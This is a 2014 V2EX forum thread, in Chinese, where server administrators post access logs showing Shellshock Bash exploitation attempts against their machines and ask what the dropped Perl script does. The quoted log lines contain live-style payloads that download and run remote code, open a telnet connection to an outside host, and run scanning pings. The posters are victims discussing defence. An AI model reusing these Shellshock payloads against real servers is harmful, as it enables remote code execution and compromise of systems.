Bash 漏洞：服务器被扫描了。。。

看到了一条日志记录：

74.201.85.77 - - [26/Sep/2014:07:35:27 +0000] "GET / HTTP/1.0" 403 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"

然后我登录了 http://208.118.61.44/wow1 这个文件，吓尿了。。。有perl大神能告诉我这个脚本是干啥的吗？

20150517

2014-09-26 19:28:48 +08:00

中马了

LazyZhu

2014-09-26 19:33:11 +08:00

http://193.2.50.126/stuff/linux/dbot.txt

kingwkb

2014-09-26 20:16:46 +08:00

检查了下，的确有

54.251.83.67 - - [26/Sep/2014:13:42:09 +0800] "GET / HTTP/1.1" 200 2664 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET / HTTP/1.0" 200 2664 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /test-cgi/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/php HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"

xd547

2014-09-26 20:19:42 +08:00

貌似我的也被扫描了
$ sudo cat * |grep bash
209.126.230.72 - - [25/Sep/2014:14:10:39 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
114.91.107.58 - - [26/Sep/2014:00:54:00 +0800] "GET / HTTP/1.1" 301 178 "-" "() { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22"
198.46.135.194 - - [26/Sep/2014:03:15:06 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 3 198.46.158.94" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"

janxin

2014-09-26 20:51:48 +08:00

看起来就是执行了个后门perl...

arcas

2014-09-26 20:53:25 +08:00

E486: 找不到模式: bash

binux

2014-09-26 20:56:48 +08:00

74.201.85.67 - - [26/Sep/2014:14:37:00 +0400] "GET /cgi-bin/test.sh HTTP/1.0" 500 192 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" "-"

也有，还是个相近的ip

binux

2014-09-26 21:01:33 +08:00

还有人干这个。。

209.126.230.72 - - [25/Sep/2014:10:24:48 +0400] "GET / HTTP/1.0" 500 192 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-"

fanta

2014-09-27 01:34:54 +08:00

那个服务器好像关了，wow1不能访问了.

chijiao

2014-09-27 10:17:27 +08:00

我的也被扫描了,我的解决方案是用squid做代理

sorcerer

2014-09-28 11:11:05 +08:00

我也被执行过这个脚本,能告诉我具体脚本做了啥吗.好有相应动作.

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/135893

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.